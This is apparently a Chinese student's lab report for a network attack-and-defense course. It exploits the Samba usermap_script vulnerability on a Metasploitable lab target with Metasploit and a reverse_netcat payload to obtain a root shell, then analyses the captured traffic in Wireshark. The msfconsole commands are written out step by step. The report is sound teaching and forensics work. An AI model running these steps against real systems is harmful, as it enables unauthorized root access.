20251904 2025-2026-2《网络攻防实践》 第七周作业

20251904 2025-2026-2 《网络攻防实践》实践七报告

目录

• 20251904 2025-2026-2 《网络攻防实践》实践七报告
  • 1.实践内容
    • 1.1实践内容
      • 使用Metasploit进行Linux远程渗透攻击
      • 攻防对抗实践
    • 1.2 知识点总结与梳理
      • Metasploit漏洞利用流程
      • Samba服务漏洞与反向Shell原理
      • Wireshark流量分析与攻击取证
  • 2.实践过程
    • 3.1 使用Metasploit进行Linux远程渗透攻击
      • 实践环境
    • 3.2 实践作业：攻防对抗实践
      • 攻击方：使用 Metasploit，选择 Metasploitable 靶机中发现的漏洞进行渗透攻击，获得远程控制权，并尝试进一步获得root权限。
      • 防守方：使用 wireshark监听获得网络攻击的数据包文件，结合 wireshark分析攻击过程，获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息
  • 3.学习中遇到的问题及解决
  • 4.实践总结

1.实践内容

1.1实践内容

使用Metasploit进行Linux远程渗透攻击

任务：使用Metasploit渗透测试软件，攻击Linux靶机上的Samba服务Usermap_script安全漏洞，获取目标Linux靶机的主机访问权限。实践步骤如下：

①启动Metasploit软件，可根据个人喜好使用msfconsole、msfgui、msfweb之一；

②使用exploit：exploit/multi/samba/usermap_script渗透攻击模块；

③选择攻击PAYLOAD为远程shell，（正向或反向连接均可）；

④设置渗透攻击参数（RHOST，LHOST，TARGET等）；

⑤执行渗透攻击；

⑥查看是否正确得到远程Shell，并查看获得的权限。

攻防对抗实践

攻击方：使用 Metasploit ，选择 Metasploitable 靶机中发现的漏洞进行渗透攻击，获得远程控制权，并尝试进一步获得root权限。

防守方：使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件，结合 wireshark/snort 分析攻击过程，获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

1.2 知识点总结与梳理

Metasploit漏洞利用流程

使用Metasploit进行渗透攻击遵循固定流程：通过search命令查找目标服务相关漏洞模块，使用use加载模块；借助show payloads和set payload选择合适的攻击载荷，以建立反向连接；show options查看并设置RHOST、LHOST等必要参数；最后执行exploit发起攻击。本次利用Samba usermap_script漏洞，成功后直接获取目标系统root权限，体现了Metasploit的高度集成化与自动化。

Samba服务漏洞与反向Shell原理

Samba是Linux下实现SMB协议的开源服务，用于文件与打印共享。usermap_script漏洞存在于Samba特定版本的用户名映射脚本处理逻辑中，攻击者可通过精心构造的请求执行任意命令。结合cmd/unix/reverse_netcat载荷，靶机会主动连接攻击机指定端口，提供一个反向Shell。该连接由内向外发起，易绕过部分防火墙限制，是渗透测试中常用的权限获取手段。

Wireshark流量分析与攻击取证

防守方通过Wireshark抓包可完整还原攻击链路：过滤相关协议流量能识别攻击源、目标及端口；追踪TCP数据流可发现攻击载荷传输与后续控制指令；结合报文时间戳能锁定攻击发起时间。

2.实践过程

3.1 使用Metasploit进行Linux远程渗透攻击

实践环境

kail：192.168.200.9
Metasploitable_ubuntu：192.168.200.5
在kali终端输入msfconsole

查找要使用的漏洞对应的模块
输入search samba得到下图找到漏洞编号为15

使用use exploit/multi/samba/usermap_script模块

输入命令show payloads查看可用载荷

set payload cmd/unix/reverse_netcat选择攻击载荷

show options查看需要配置的参数

set RHOST 192.168.200.5，set LHOST 192.168.200.9配置靶机和攻击机参数

exploit进行攻击

成功后输入ifconfig查看靶机的ip地址

输入whoami可以查看到已获得root权限

3.2 实践作业：攻防对抗实践

攻击方：使用 Metasploit，选择 Metasploitable 靶机中发现的漏洞进行渗透攻击，获得远程控制权，并尝试进一步获得root权限。

重复第一个实验

exploit进行攻击

攻击成功后输入指令shell和id查看shell权限账户及其所在的权限组，输入指令whoami查看当前权限账户

防守方：使用 wireshark监听获得网络攻击的数据包文件，结合 wireshark分析攻击过程，获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息

打开wireshark，监听数据包：

分析捕包结果可得：
攻击类型：SMB
攻击者IP为192.168.200.9；
目标IP为192.168.200.5，目标端口为139
139端口提供NetBIOS会话服务，用于Windows文件与打印共享，常成为SMB攻击的入口。
Samba是SMB协议的开源实现，支持跨平台文件与打印共享。
本次攻击利用了Samba服务的漏洞
攻击机首先向靶机发送SMB协商协议请求（Negotiate Protocol Request）报文，靶机随后回复协商协议响应（Negotiate Protocol Response）报文。接着，攻击机向靶机发起会话设置请求（Session Setup X Request）报文，靶机在验证身份后，返回一个会话设置响应（Session Setup X Response）报文，同意建立本次连接。

追踪SMB数据包的TCP流，得出攻击机利用4444端口与靶机建立telnet服务：

对一个TCP数据包分析可以得到ARP协议的询问开始时间即攻击发起的时间，为2026年5月9日10：49：44

在wireshark追踪对应的TCP流可以看见运行攻击指令之后输入的指令：

3.学习中遇到的问题及解决

• 问题1：输入exploit之后显示msf exploit(multi/samba/usermap_script) > exploit
  [-] 192.168.200.130:139 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (192.168.200.130:139) timed out.
  [*] Exploit completed, but no session was created.
• 问题1解决方案：检查后发现靶机和攻击机参数配置反了，修改后解决问题

4.实践总结

本次实践使用Metasploit成功渗透Metasploitable靶机，获取root权限，并通过Wireshark完整捕获攻击流量，分析了攻击IP、端口、SMB漏洞利用及交互指令，加深了对渗透攻击流程与网络防御检测的理解，也提升了我的安全防护意识。